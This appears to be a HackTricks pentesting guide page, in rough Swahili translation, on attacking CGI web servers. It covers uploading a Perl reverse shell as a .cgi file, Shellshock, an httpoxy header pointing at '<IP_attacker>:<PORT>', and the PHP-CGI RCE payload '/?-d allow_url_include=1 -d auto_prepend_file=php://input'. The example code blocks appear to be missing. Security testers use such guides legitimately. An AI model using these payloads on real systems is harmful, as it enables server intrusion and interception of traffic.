CGI
Last updated
Last updated
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Panua ujuzi wako katika Usalama wa Simu na 8kSec Academy. Master usalama wa iOS na Android kupitia kozi zetu za kujifunza kwa kasi yako na upate cheti:
CGI scripts ni scripts za perl, hivyo, ikiwa umepata udhibiti wa seva inayoweza kutekeleza .cgi scripts unaweza kupakia shell ya perl reverse (/usr/share/webshells/perl/perl-reverse-shell.pl
), badilisha kiambishi kutoka .pl hadi .cgi, toa idhini za kutekeleza (chmod +x
) na fikia shell ya reverse kutoka kwa kivinjari cha wavuti ili kuitekeleza. Ili kujaribu CGI vulns inashauriwa kutumia nikto -C all
(na plugins zote)
ShellShock ni udhaifu unaoathiri Bash shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash wa kutekeleza amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa mabadiliko ya mazingira, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hii kwa kuambatanisha kodhi mbaya kwenye mabadiliko ya mazingira, ambayo inatekelezwa wanapopokea mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo.
Kutatua udhaifu huu ukurasa unaweza kutoa kosa.
Unaweza kupata udhaifu huu kwa noticing kwamba inatumia toleo la zamani la Apache na cgi_mod (pamoja na folda ya cgi) au kutumia nikto.
Majaribio mengi yanategemea echo kitu na kutarajia kwamba ile string inarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na ujaribu hizo.
Nmap
CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com"
Kama variable ya HTTP_PROXY inaweza kutumika na seva ya wavuti. Jaribu kutuma kichwa chenye: "Proxy: <IP_attacker>:<PORT>" na ikiwa seva itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na seva.
Kimsingi ikiwa cgi iko hai na php ni "ya zamani" (<5.3.12 / < 5.4.2) unaweza kutekeleza msimbo. Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la seva ya wavuti bila kutuma vigezo (hasa bila kutuma herufi "="). Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano /index.php?-s
(angalia -s
) na msimbo wa chanzo wa programu utaonekana katika jibu.
Kisha, ili kupata RCE unaweza kutuma uchunguzi huu maalum: /?-d allow_url_include=1 -d auto_prepend_file=php://input
na msimbo wa PHP utakaotekelezwa katika mwili wa ombi. Mfano:
Maelezo zaidi kuhusu vuln na uwezekano wa exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, Mfano wa CTF Writeup.
Panua ujuzi wako katika Usalama wa Simu na 8kSec Academy. Master usalama wa iOS na Android kupitia kozi zetu za kujifunza kwa kasi yako na upate cheti:
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)